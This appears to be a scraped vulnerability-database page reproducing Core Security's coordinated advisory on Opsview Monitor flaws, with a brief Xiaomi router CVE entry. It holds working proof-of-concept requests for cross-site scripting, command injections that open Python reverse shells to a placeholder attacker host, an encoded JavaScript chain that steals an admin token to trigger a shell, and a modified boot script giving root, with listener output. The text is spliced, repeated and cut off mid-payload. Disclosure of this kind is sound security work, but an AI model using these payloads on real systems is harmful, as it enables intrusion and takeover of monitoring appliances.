[{"property":"name","root":"data","direction":"ASC"}]}},"contact":{"storeState":{"pageSize":50,"filters":[],"page":1,"sorters":[{"direction":"ASC","property":"name","root":"data"}]}},"</script><script>alert(4)</script>":{"storeState":{"sorters":[{"root":"data","property":"name","direction":"ASC"}],"pageSize":50,"filters":[],"page":1}},"hostcheckcommand":{"storeState":{"pageSize":50,"filters":[],"page":1,"sorters":[{"direction":"ASC","property":"priority","root":"data"}]}},"netflow_collector":{"storeState":{"sorters":[{"direction":"ASC","root":"data","property":"name"}],"page":1,"filters":[],"pageSize":50}},"<script>alert(4)</script>":{"storeState":{"sorters":[{"direction":"ASC","root":"data","property":"name"}],"
-----/
7.3.
The following proof of concept executes a reverse shell:
/-----
POST /rest/config/notificationmethod/testnotification?_dc=1520444703477
HTTP/1.1
Host: <serverIP>
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0)
Gecko/20100101 Firefox/58.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://<serverIP>/settings/
x-opsview-username: admin
x-opsview-token: 7ac1116c336cc648cda6caa707a17d7aa6114074
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 376
Cookie: redirect=1; testing=1; sid=9bfa04afc5ccc966c623078bab8834e0;
opsview_web_session=5071271ffb62fffffcb589c9ae9ab9c23d780b13;
auth_tkt=MDA1M2JmODhmYTlmNWM1NDEyNzM3ZWRiYWJiMTBmZTA1YWEwMWY0M2FkbWluIU9QU1ZJRVdfQURNSU4sQUNUSU9OQUxMLEFETUlOQUNDRVNTLEJTTSxDT05GSUdVUkVCU00sQ09ORklHVVJFQlNNQ09NUE9ORU5ULENPTkZJR1VSRUNPTlRBQ1RTLENPTkZJR1VSRUhPU1RHUk9VUFMsQ09ORklHVVJFSE9TVFMsQ09ORklHVVJFS0VZV09SRFMsQ09ORklHVVJFTkVURkxPVyxDT05GSUdVUkVQUk9GSUxFUyxDT05GSUdVUkVST0xFUyxDT05GSUdVUkVTQVZFLENPTkZJR1VSRVZJRVcsREFTSEJPQVJELERBU0hCT0FSREVESVQsREFTSEJPQVJEU0hBUkUsRE9XTlRJTUVTT01FLE5BVk9QVElPTlMsTkVUQVVESVRWSUVXLE5FVEZMT1csTk9USUZZU09NRSxQQVNTV09SRFNBVkUsUkVMT0FEQUNDRVNTLFJFUE9SVEFETUlOLFJFUE9SVFVTRVIsUlJER1JBUEhTLFRFU1RBTEwsVEVTVENIQU5HRSxWSUVXQUxMLFZJRVdQT1JUQUNDRVNTIQ%3D%3D
Connection: close
{"message":"Test
Message","command":"submit_xmpp_script","variables":[],"test_variables":[{"name":"PAGER","value":"123123123
|| python -c 'import
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"<attackerIP>\",16000));os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"}],"id":"20"}
-----/
/-----
nc -lvp 16000
Listening on [0.0.0.0] (family 0, port 16000)
Connection from [<serverIP>] port 16000 [tcp/*] accepted (family 2,
sport 43016)
$ id
uid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview)
-----/
Additionally, it is possible to combine this issue with a redirection
functionality within the management console and the vulnerability
described in 7.1 (Reflected Cross-Site Scripting), to build a specially
crafted link that could be sent to an administrator to trigger a reverse
shell.
In order to perform the attack, consider the following:
. API's sensitive actions require a 'restToken' to be processed. This
token could be obtained by a Cross-Site Scripting attack from a specific
endpoint (/settings). Abuse the login page redirection functionality to force the user to
access the Cross-Site Scripting vulnerable URL described in 7.1 (you may
also abuse the Cross-Site scripting vulnerability reported in
https://www.cvedetails.com/cve/CVE-2016-2511/ given it is still present).
If the user is already authenticated he will be automatically redirected.
Otherwise, the login page will appear and the redirection will take
place after a successful login.
The following proof of concept presents a crafted link that could
trigger a reverse shell if accessed by an administrator:
/-----
https://<serverIP>/login?back=%2Frest%2Fdiagnosticsb2ksy%253cscript%253eeval(atob(%27dmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpO3hoci5vbnJlYWR5c3RhdGVjaGFuZ2UgPSBmdW5jdGlvbigpIHtpZiAoeGhyLnJlYWR5U3RhdGUgPT0gWE1MSHR0cFJlcXVlc3QuRE9ORSl7cmVnZXhwID0gLyg%2FOnJlc3RUb2tlbiI6IikoLio%2FKSg%2FOiIpLzt0b2tlbiA9IHJlZ2V4cC5leGVjKHhoci5yZXNwb25zZVRleHQpWzFdO3JlZ2V4cCA9IC8oPzp1c2VyTmFtZSI6IikoLio%2FKSg%2FOiIpLzt1c2VybmFtZSA9IHJlZ2V4cC5leGVjKHhoci5yZXNwb25zZVRleHQpWzFdO3ZhciB4aHIyID0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7eGhyMi5vcGVuKCdQT1NUJywgJy9yZXN0L2NvbmZpZy9ub3RpZmljYXRpb25tZXRob2QvdGVzdG5vdGlmaWNhdGlvbi8nLCB0cnVlKTt4aHIyLnNldFJlcXVlc3RIZWFkZXIoIngtb3Bzdmlldy11c2VybmFtZSIsIHVzZXJuYW1lKTtjb25zb2xlLmxvZyh1c2VybmFtZSk7Y29uc29sZS5sb2codG9rZW4pO3hocjIuc2V0UmVxdWVzdEhlYWRlcigieC1vcHN2aWV3LXRva2VuIiwgdG9rZW4pO3hocjIuc2V0UmVxdWVzdEhlYWRlcigiQ29udGVudC1UeXBlIiwgImFwcGxpY2F0aW9uL2pzb24iKTtib2R5ID0geyJtZXNzYWdlIjoiVGVzdCBNZXNzYWdlIiwiY29tbWFuZCI6InN1Ym1pdF94bXBwX3NjcmlwdCIsInZhcmlhYmxlcyI6W10sInRlc3RfdmFyaWFibGVzIjpbeyJuYW1lIjoiUEFHRVIiLCJ2YWx1ZSI6IjEyMzEyMzEyMyB8fCBweXRob24gLWMgJ2ltcG9ydCBzb2NrZXQsc3VicHJvY2VzcyxvcztzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsc29ja2V0LlNPQ0tfU1RSRUFNKTtzLmNvbm5lY3QoKFwiPGF0dGFja2VySVA%2BXCIsMTYwMDApKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTsgb3MuZHVwMihzLmZpbGVubygpLDIpO3A9c3VicHJvY2Vzcy5jYWxsKFtcIi9iaW4vc2hcIixcIi1pXCJdKTsnIn1dLCJpZCI6IjEifTt4aHIyLnNlbmQoSlNPTi5zdHJpbmdpZnkoYm9keSkpO2FsZXJ0KHRva2VuKTthbGVydCh1c2VybmFtZSk7fX07eGhyLm9wZW4oJ1BPU1QnLCAnL3NldHRpbmdzLycsIHRydWUpO3hoci5zZW5kKG51bGwpOw%3D%3D%27))%253c%25252fscript%253ev7uol%3ffilename=1%26download=1
-----/
Once clicked, the authenticated administrator will be redirected to the
vulnerable section where his browser will perform a request to the
'/settings' endpoint in order to obtain a valid 'restToken'. Finally,
using that token, the API request to
'rest/config/notificationmethod/testnotification' will be exploited thus
resulting in a reverse shell.
7.4. **Rancid test connection functionality abuse leading to command
execution**
[CVE-2018-16144] NetAudit is a section within Network Analyzer that
allows the user to automate the backing up of network devices'
configuration files to a centralized location. The test connection
functionality is vulnerable to command injection due to an improper
sanitization of the 'rancid_password' parameter.
The following proof of concept executes a reverse shell:
/-----
POST /rest/config/host/test_rancid_connection?_dc=1521569909290 HTTP/1.1
Host: <serverIP>
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0)
Gecko/20100101 Firefox/59.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://<serverIP>/settings/
x-opsview-username: admin
x-opsview-token: b3d716e0157fd6337e6978220188051d8c578850
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 434
Cookie: opsview_web_session=8f48a60452543863c3ee3662202a0d0ef568e86f;
auth_tkt=ZTJlMWFlODQ4ZTVhYmJiN2I3YTQzNWYxNzkzYjAxYWU1YWIxNGI1NWFkbWluIU9QU1ZJRVdfQURNSU4sQUNUSU9OQUxMLEFETUlOQUNDRVNTLEJTTSxDT05GSUdVUkVCU00sQ09ORklHVVJFQlNNQ09NUE9ORU5ULENPTkZJR1VSRUNPTlRBQ1RTLENPTkZJR1VSRUhPU1RHUk9VUFMsQ09ORklHVVJFSE9TVFMsQ09ORklHVVJFS0VZV09SRFMsQ09ORklHVVJFTkVURkxPVyxDT05GSUdVUkVQUk9GSUxFUyxDT05GSUdVUkVST0xFUyxDT05GSUdVUkVTQVZFLENPTkZJR1VSRVZJRVcsREFTSEJPQVJELERBU0hCT0FSREVESVQsREFTSEJPQVJEU0hBUkUsRE9XTlRJTUVTT01FLE5BVk9QVElPTlMsTkVUQVVESVRWSUVXLE5FVEZMT1csTk9USUZZU09NRSxQQVNTV09SRFNBVkUsUkVMT0FEQUNDRVNTLFJFUE9SVEFETUlOLFJFUE9SVFVTRVIsUlJER1JBUEhTLFRFU1RBTEwsVEVTVENIQU5HRSxWSUVXQUxMLFZJRVdQT1JUQUNDRVNTIQ%3D%3D
Connection: close
ip=<attackerIP>++++++&rancid_vendor=1&rancid_username=234234+add+password+xxxxx&rancid_connection_type=telnet&rancid_autoenable=1&rancid_password=2342342342+%3b+sleep%2011%3b%20`python+-c+'import+socket,subprocess,os%3bs%3dsocket.socket(socket.AF_INET,socket.SOCK_STREAM)%3bs.connect(("<attackerIP>",16000))%3bos.dup2(s.fileno(),0)%3b+os.dup2(s.fileno(),1)%3b+os.dup2(s.fileno(),2)%3bp%3dsubprocess.call(["/bin/sh","-i"])%3b'`&host_id=2
-----/
/-----
nc -lvp 16000
Listening on [0.0.0.0] (family 0, port 16000)
Connection from [<serverIP>] port 16000 [tcp/*] accepted (family 2,
sport 43016)
$ id
uid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview)
$ uname -a
Linux image-builder-299 4.4.0-1010-aws #10-Ubuntu SMP Tue Jan 9 23:01:34
UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
-----/
7.5. **Script modification could allow local privilege escalation**
[CVE-2018-16145] Most of the services in Opsview Monitor run with nagios
privileges and the scripts that run at boot time, impersonate nagios
user during its execution. However, the
'/etc/init.d/opsview-reporting-module' script invokes the
'/opt/opsview/jasper/bin/db_jasper' script before dropping root
privileges.
The following excerpt shows the vulnerable code:
/-----
/etc/init.d/opsview-reporting-module:
/opt/opsview/jasper/bin/db_jasper db_exists 2> /dev/null
if [ $? != 0 ]; then
echo "Attempted to start jasperserver but MySQL credentials are wrong."
exit 0
fi
DAEMON=/opt/opsview/jasper/bin/rc.jasperserver
test -x $DAEMON || exit 0
# Switch to opsview user if run as root
id | grep "uid=0(" >/dev/null
if [ $? = 0 ] ; then
su - opsview -c "$DAEMON $@"
else
exec $DAEMON $@
fi
-----/
The file '/opt/opsview/jasper/bin/db_jasper', which is invoked by the
vulnerable script, can be edited by the nagios user which belongs to the
'opsview' group.
/-----
ls -ltr /opt/opsview/jasper/bin/db_jasper
-rwxrwxr-x 1 opsview opsview 2531 Feb 6 2017
/opt/opsview/jasper/bin/db_jasper
nagios@image-builder-299:/home/admin$ id
uid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview)
-----/
Since 'db_jasper' receives 'db_exists' as an argument, which is later
used in a case statement, an attacker could edit that specific part of
the script in order to execute arbitrary code once the appliance is
rebooted.
The following excerpt shows the attacker's bash script which, after
execution, will trigger a reverse shell with root privileges:
/-----
while [ "x$1" != "x" ] ; do
case "$1" in
db_export)
db_export
;;
db_export_test)
db_export_test
;;
db_export_initial)
TEST=1
db_backup
;;
db_import)
db_import
;;
db_install)
db_install
;;
db_backup)
db_backup
;;
db_restore)
db_restore
;;
db_exists)
python -c 'import
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<attackerIP>",16000));os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' &
db_exists
exit $?
;;
db_upgrade)
db_upgrade
exit $?
;;
*)
die "Usage: $0
{db_export|db_import|db_install|db_backup|db_restore}"
;;
esac
shift
done
-----/
/-----
$nc -lvp 16000
Listening on [0.0.0.0] (family 0, port 16000)
Connection from [<serverIP>] port 16000 [tcp/*] accepted (family 2,
sport 45566)
# id
uid=0(root) gid=0(root) groups=0(root)
-----/
8. **Report Timeline**
2018-05-03: Core Security sent an initial notification to Opsview,
asking for GPG keys in order to send draft advisory.
2018-05-04: Opsview replied attaching its GPG keys.
2018-05-04: Core Security sent the encrypted draft advisory.
2018-05-04: Opsview confirmed the reception of the advisory and informed
an initial response would be ready by May 11th.
2018-05-11: Opsview replied saying they were able to reproduce all of
the reported vulnerabilities and confirmed that they were present in all
supported versions of Opsview Monitor (5.4, 5.3 and 5.2).
In addition, Opsview informed that were planning to release a fix for
these versions by the end of July.
2018-05-11: Core Security thanked the confirmation.
2018-06-25: Opsview informed that they were planning to release a major
update for the product (6.0) at the end of July. This update will
address all reported vulnerabilities. Also, they informed that the
previous versions of the product would be fixed by the end of August.
2018-06-27: Core Security thanked the status update and asked for a
tentative public disclosure date.
2018-07-16: Core Security requested a status update.
2018-07-18: Opsview proposed to set a tentative publication date by the
end of August when they release the fixes for its earlier versions.
2018-07-18: Core Security agreed with the Opsview's proposal.
2018-07-23: Opsview notified Core Security that the Opsview Monitor 6.0
release will be available on July 25th. In addition, they
informed that they didn't have the exact release date for the updates to
previous versions of the product.
2018-08-06: Core Security requested a status update for the remaining
fixes.
2018-08-13: Opsview replied saying that they were targeting the week of
August 24th for release the fixes of their earlier product versions and
they would confirm the exact date at the end of the next week.
2018-08-13: Core Security thanked the reply.
2018-08-24: Opsview informed Core Security that the remaining fixed
versions will be available on August 29th.
2018-08-24: Core Security thanked the update and proposed September 4th
as the coordinated release date.
2018-08-28: Opsview agreed on the proposed release date.
2018-09-04: Advisory CORE-2018-0008 published.
9. **References**
[1] https://www.opsview.com/solutions
10. **About CoreLabs**
CoreLabs, the research center of Core Security, is charged with
anticipating the future needs and requirements for information security
technologies.
We conduct our research in several important areas of computer security
including system vulnerabilities, cyber attack planning and simulation,
source code auditing, and cryptography. Our results include problem
formalization, identification of vulnerabilities, novel solutions and
prototypes for new technologies. CoreLabs regularly publishes security
advisories, technical papers, project information and shared software
tools for public use at: http://corelabs.coresecurity.com.
11. **About Core Security**
Core Security provides companies with the security insight they need to
know who, how, and what is vulnerable in their organization. The
company's threat-aware, identity & access, network security, and
vulnerability management solutions provide actionable insight and
context needed to manage security risks across the enterprise. This
shared insight gives customers a comprehensive view of their security
posture to make better security remediation decisions. Better insight
allows organizations to prioritize their efforts to protect critical
assets, take action sooner to mitigate access risk, and react faster if
a breach does occur.
Core Security is headquartered in the USA with offices and operations in
South America, Europe, Middle East and Asia. To learn more, contact Core
Security at (678) 304-4500 or info@coresecurity.com
12. **Disclaimer**
The contents of this advisory are copyright (c) 2018 Core Security and
(c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution
Non-Commercial Share-Alike 3.0 (United States) License:
http://creativecommons.org/licenses/by-nc-sa/3.0/us/
| VAR-201809-0912 | CVE-2018-16307 | Xiaomi MIWiFi Xiaomi_55DD Information disclosure vulnerabilities in devices |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
An "Out-of-band resource load" issue was discovered on Xiaomi MIWiFi Xiaomi_55DD Version 2.8.50 devices. It is possible to induce the application to retrieve the contents of an arbitrary external URL and return those contents in its own response. If a domain name (containing a random string) is used in the HTTP Host header, the application performs an HTTP request to the specified domain. The response from that request is then included in the application's own response. Xiaomi MIWiFi Xiaomi_55DD The device contains an information disclosure vulnerability.Information may be obtained. Xiaomi MIWiFi Xiaomi_55DD is a wireless router of China Xiaomi.
Xiaomi MIWiFi Xiaomi_55DD There is a security vulnerability in version 2.8.50
| VAR-201809-0902 | CVE-2018-16144 |
Opsview Monitor Command injection vulnerability
Related entries in the VARIoT exploits database: VAR-E-201602-0212 |
CVSS V2: 10.0 CVSS V3: 9.8 Severity: CRITICAL |
The test connection functionality in the NetAudit section of Opsview Monitor before 5.3.1 and 5.4.x before 5.4.2 is vulnerable to command injection due to improper sanitization of the rancid_password parameter. Opsview Monitor Contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. OpsviewMonitor is a virtual appliance designed to be deployed in an organization's network infrastructure. It is bundled with the web management console to monitor and manage the host and its services. OpsviewMonitor has a command execution vulnerability that allows an attacker to obtain command execution on the system as a nagios user. Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/
Opsview Monitor Multiple Vulnerabilities
1. **Advisory Information**
Title: Opsview Monitor Multiple Vulnerabilities
Advisory ID: CORE-2018-0008
Advisory URL:
http://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities
Date published: 2018-09-04
Date of last update: 2018-09-04
Vendors contacted: Opsview
Release mode: Coordinated release
2. **Vulnerability Information**
Class: Improper Neutralization of Input During Web Page Generation
[CWE-79], Improper Neutralization of Input During Web Page Generation
[CWE-79], Improper Neutralization of Special Elements used in an OS
Command [CWE-78], Improper Neutralization of Special Elements used in
an OS Command [CWE-78], Execution with Unnecessary Privileges [CWE-250]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2018-16148, CVE-2018-16147, CVE-2018-16146, CVE-2018-16144,
CVE-2018-16145
3. **Vulnerability Description**
Opsview's website states that:
Opsview[1] builds monitoring software that helps DevOps understand how
the performance of their hybrid IT infrastructure & apps impacts
business service delivery. Opsview Monitor supports +3500 Nagios plugins
and service checks making it easy to monitor everything from Docker and
VMware to Amazon Web Services, Hyper-V and more.
4. **Vulnerable Packages**
. Opsview Monitor 5.4
. Opsview Monitor 5.3
. Opsview Monitor 5.2
Other products and versions might be affected, but they were not tested.
5. **Vendor Information, Solutions and Workarounds**
Opsview released the following versions of its product that fix the
reported issues. Opsview Monitor 6.0
. Opsview Monitor 5.4.2
. Opsview Monitor 5.3.1
In addition, Opsview published the following release notes:
. https://knowledge.opsview.com/v5.4/docs/whats-new
. https://knowledge.opsview.com/v5.3/docs/whats-new
6. **Credits**
These vulnerabilities were discovered and researched by Fernando Diaz
and Fernando Catoira from Core Security Consulting Services. The
publication of this advisory was coordinated by Leandro Cuozzo from Core
Advisories Team.
7.
Multiple vulnerabilities were found in the context of this appliance,
which could allow a remote attacker to compromise the system.
Vulnerabilities described in 7.1 and 7.2 could be abused to execute
malicious JavaScript code in the context of a legitimate user. Finally, the
issue found in one of the scripts run during the boot process presented
in 7.5 would allow attackers to elevate their privileges from nagios
user to root after a system restart, hence obtaining full control of the
appliance.
7.1. **Reflected Cross-Site Scripting in Diagnostics**
[CVE-2018-16148] The 'diagnosticsb2ksy' parameter of the '/rest'
endpoint is vulnerable to Cross-Site Scripting.
The following proof of concept demonstrates the vulnerability:
/-----
GET
/rest/diagnosticsb2ksy%253cscript%253ealert(1)%253c%252fscript%253ev7uol%3ffilename=1%26download=1
HTTP/1.1
Host: <serverIP>
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0)
Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: opsview_web_session=46f985298c7bba5291a18c3a749362a08eaa9401;
auth_tkt=ODFlYjc4YjVlN2M5ZmQ2MDUyNzhlMTEyZTM1ZjRmODM1YWI5ODUzMGFkbWluIU9QU1ZJRVdfQURNSU4sQUNUSU9OQUxMLEFETUlOQUNDRVNTLEJTTSxDT05GSUdVUkVCU00sQ09ORklHVVJFQlNNQ09NUE9ORU5ULENPTkZJR1VSRUNPTlRBQ1RTLENPTkZJR1VSRUhPU1RHUk9VUFMsQ09ORklHVVJFSE9TVFMsQ09ORklHVVJFS0VZV09SRFMsQ09ORklHVVJFTkVURkxPVyxDT05GSUdVUkVQUk9GSUxFUyxDT05GSUdVUkVST0xFUyxDT05GSUdVUkVTQVZFLENPTkZJR1VSRVZJRVcsREFTSEJPQVJELERBU0hCT0FSREVESVQsREFTSEJPQVJEU0hBUkUsRE9XTlRJTUVTT01FLE5BVk9QVElPTlMsTkVUQVVESVRWSUVXLE5FVEZMT1csTk9USUZZU09NRSxQQVNTV09SRFNBVkUsUkVMT0FEQUNDRVNTLFJFUE9SVEFETUlOLFJFUE9SVFVTRVIsUlJER1JBUEhTLFRFU1RBTEwsVEVTVENIQU5HRSxWSUVXQUxMLFZJRVdQT1JUQUNDRVNTIQ%3D%3D
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
-----/
7.2. **Persistent Cross-Site Scripting in Settings endpoint**
[CVE-2018-16147] The 'data' parameter of the '/settings/api/router'
endpoint is vulnerable to Cross-Site Scripting. The following proof of
concept demonstrates the vulnerability:
/-----
POST /settings/api/router?_dc=1521575692128 HTTP/1.1
Host: <serverIP>
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0)
Gecko/20100101 Firefox/59.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://<serverIP>/settings/
x-opsview-username: rifle
x-opsview-token: 053f415648640ea5a9d0c6e3e7f5603cf7b08503
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 506
Cookie: opsview_web_session=3b8059865b28b96a5cd27a6d4fb4193bed9aa256;
auth_tkt=ZTFiMzFlODc1ZDUzYzk3MzEwMGM2MjhiZTgxMzRhMDQ1YWIxNWNlOXBlbnRlc3QhREFTSEJPQVJELERBU0hCT0FSREVESVQsREFTSEJPQVJEU0hBUkUsTkFWT1BUSU9OUyxOT1RJRllTT01FLFBBU1NXT1JEU0FWRSxSUkRHUkFQSFMsVklFV0FMTCE%3D
Connection: close
[{"action":"SettingsServer","method":"setObjecttypeState","data":["</script><script>alert(4)</script>","{\"storeState\":{\"sorters\":[{\"root\":\"data\",\"property\":\"name\",\"direction\":\"ASC\"}],\"filters\":[],\"pageSize\":50,\"page\":1}}"],"type":"rpc","tid":2},{"action":"SettingsServer","method":"setObjecttypeState","data":["profile","{\"storeState\":{\"sorters\":[{\"root\":\"data\",\"property\":\"name\",\"direction\":\"ASC\"}],\"filters\":[],\"pageSize\":50,\"page\":1}}"],"type":"rpc","tid":3}]
-----/
The input will be stored without any sanitization and rendered every
time the /settings section is visited by the user. It's important to
point that this XSS is self stored and it's executed only in the context
of the victim's session. However, this vulnerability can be exploited by
an attacker to gain persistency and execute the malicious code each time
the victim accesses to the settings section.
Excerpt of the source code showing the injected script tag:
/-----
[{"property":"name","root":"data","direction":"ASC"}]}},"contact":{"storeState":{"pageSize":50,"filters":[],"page":1,"sorters":[{"direction":"ASC","property":"name","root":"data"}]}},"</script><script>alert(4)</script>":{"storeState":{"sorters":[{"root":"data","property":"name","direction":"ASC"}],"pageSize":50,"filters":[],"page":1}},"hostcheckcommand":{"storeState":{"pageSize":50,"filters":[],"page":1,"sorters":[{"direction":"ASC","property":"priority","root":"data"}]}},"netflow_collector":{"storeState":{"sorters":[{"direction":"ASC","root":"data","property":"name"}],"page":1,"filters":[],"pageSize":50}},"<script>alert(4)</script>":{"storeState":{"sorters":[{"direction":"ASC","root":"data","property":"name"}],"
-----/
7.3. **Notification abuse leading to remote command execution**
[CVE-2018-16146] Opsview Web Management console provides a functionality
accessible by an authenticated administrator to test notifications that
are triggered under certain configurable events. The 'value' parameter
is not properly sanitized, leading to an arbitrary command injection
executed on the system with nagios' user privileges.
The following proof of concept executes a reverse shell:
/-----
POST /rest/config/notificationmethod/testnotification?_dc=1520444703477
HTTP/1.1
Host: <serverIP>
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0)
Gecko/20100101 Firefox/58.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://<serverIP>/settings/
x-opsview-username: admin
x-opsview-token: 7ac1116c336cc648cda6caa707a17d7aa6114074
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 376
Cookie: redirect=1; testing=1; sid=9bfa04afc5ccc966c623078bab8834e0;
opsview_web_session=5071271ffb62fffffcb589c9ae9ab9c23d780b13;
auth_tkt=MDA1M2JmODhmYTlmNWM1NDEyNzM3ZWRiYWJiMTBmZTA1YWEwMWY0M2FkbWluIU9QU1ZJRVdfQURNSU4sQUNUSU9OQUxMLEFETUlOQUNDRVNTLEJTTSxDT05GSUdVUkVCU00sQ09ORklHVVJFQlNNQ09NUE9ORU5ULENPTkZJR1VSRUNPTlRBQ1RTLENPTkZJR1VSRUhPU1RHUk9VUFMsQ09ORklHVVJFSE9TVFMsQ09ORklHVVJFS0VZV09SRFMsQ09ORklHVVJFTkVURkxPVyxDT05GSUdVUkVQUk9GSUxFUyxDT05GSUdVUkVST0xFUyxDT05GSUdVUkVTQVZFLENPTkZJR1VSRVZJRVcsREFTSEJPQVJELERBU0hCT0FSREVESVQsREFTSEJPQVJEU0hBUkUsRE9XTlRJTUVTT01FLE5BVk9QVElPTlMsTkVUQVVESVRWSUVXLE5FVEZMT1csTk9USUZZU09NRSxQQVNTV09SRFNBVkUsUkVMT0FEQUNDRVNTLFJFUE9SVEFETUlOLFJFUE9SVFVTRVIsUlJER1JBUEhTLFRFU1RBTEwsVEVTVENIQU5HRSxWSUVXQUxMLFZJRVdQT1JUQUNDRVNTIQ%3D%3D
Connection: close
{"message":"Test
Message","command":"submit_xmpp_script","variables":[],"test_variables":[{"name":"PAGER","value":"123123123
|| python -c 'import
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"<attackerIP>\",16000));os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"}],"id":"20"}
-----/
/-----
nc -lvp 16000
Listening on [0.0.0.0] (family 0, port 16000)
Connection from [<serverIP>] port 16000 [tcp/*] accepted (family 2,
sport 43016)
$ id
uid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview)
-----/
Additionally, it is possible to combine this issue with a redirection
functionality within the management console and the vulnerability
described in 7.1 (Reflected Cross-Site Scripting), to build a specially
crafted link that could be sent to an administrator to trigger a reverse
shell.
In order to perform the attack, consider the following:
. API's sensitive actions require a 'restToken' to be processed. This
token could be obtained by a Cross-Site Scripting attack from a specific
endpoint (/settings). Abuse the login page redirection functionality to force the user to
access the Cross-Site Scripting vulnerable URL described in 7.1 (you may
also abuse the Cross-Site scripting vulnerability reported in
https://www.cvedetails.com/cve/CVE-2016-2511/ given it is still present).
If the user is already authenticated he will be automatically redirected.
Otherwise, the login page will appear and the redirection will take
place after a successful login.
The following proof of concept presents a crafted link that could
trigger a reverse shell if accessed by an administrator:
/-----
https://<serverIP>/login?back=%2Frest%2Fdiagnosticsb2ksy%253cscript%253eeval(atob(%27dmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpO3hoci5vbnJlYWR5c3RhdGVjaGFuZ2UgPSBmdW5jdGlvbigpIHtpZiAoeGhyLnJlYWR5U3RhdGUgPT0gWE1MSHR0cFJlcXVlc3QuRE9ORSl7cmVnZXhwID0gLyg%2FOnJlc3RUb2tlbiI6IikoLio%2FKSg%2FOiIpLzt0b2tlbiA9IHJlZ2V4cC5leGVjKHhoci5yZXNwb25zZVRleHQpWzFdO3JlZ2V4cCA9IC8oPzp1c2VyTmFtZSI6IikoLio%2FKSg%2FOiIpLzt1c2VybmFtZSA9IHJlZ2V4cC5leGVjKHhoci5yZXNwb25zZVRleHQpWzFdO3ZhciB4aHIyID0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7eGhyMi5vcGVuKCdQT1NUJywgJy9yZXN0L2NvbmZpZy9ub3RpZmljYXRpb25tZXRob2QvdGVzdG5vdGlmaWNhdGlvbi8nLCB0cnVlKTt4aHIyLnNldFJlcXVlc3RIZWFkZXIoIngtb3Bzdmlldy11c2VybmFtZSIsIHVzZXJuYW1lKTtjb25zb2xlLmxvZyh1c2VybmFtZSk7Y29uc29sZS5sb2codG9rZW4pO3hocjIuc2V0UmVxdWVzdEhlYWRlcigieC1vcHN2aWV3LXRva2VuIiwgdG9rZW4pO3hocjIuc2V0UmVxdWVzdEhlYWRlcigiQ29udGVudC1UeXBlIiwgImFwcGxpY2F0aW9uL2pzb24iKTtib2R5ID0geyJtZXNzYWdlIjoiVGVzdCBNZXNzYWdlIiwiY29tbWFuZCI6InN1Ym1pdF94bXBwX3NjcmlwdCIsInZhcmlhYmxlcyI6W10sInRlc3RfdmFyaWFibGVzIjpbeyJuYW1lIjoiUEFHRVIiLCJ2YWx1ZSI6IjEyMzEyMzEyMyB8fCBweXRob24gLWMgJ2ltcG9ydCBzb2NrZXQsc3VicHJvY2VzcyxvcztzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsc29ja2V0LlNPQ0tfU1RSRUFNKTtzLmNvbm5lY3QoKFwiPGF0dGFja2VySVA%2BXCIsMTYwMDApKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTsgb3MuZHVwMihzLmZpbGVubygpLDIpO3A9c3VicHJvY2Vzcy5jYWxsKFtcIi9iaW4vc2hcIixcIi1pXCJdKTsnIn1dLCJpZCI6IjEifTt4aHIyLnNlbmQoSlNPTi5zdHJpbmdpZnkoYm9keSkpO2FsZXJ0KHRva2VuKTthbGVydCh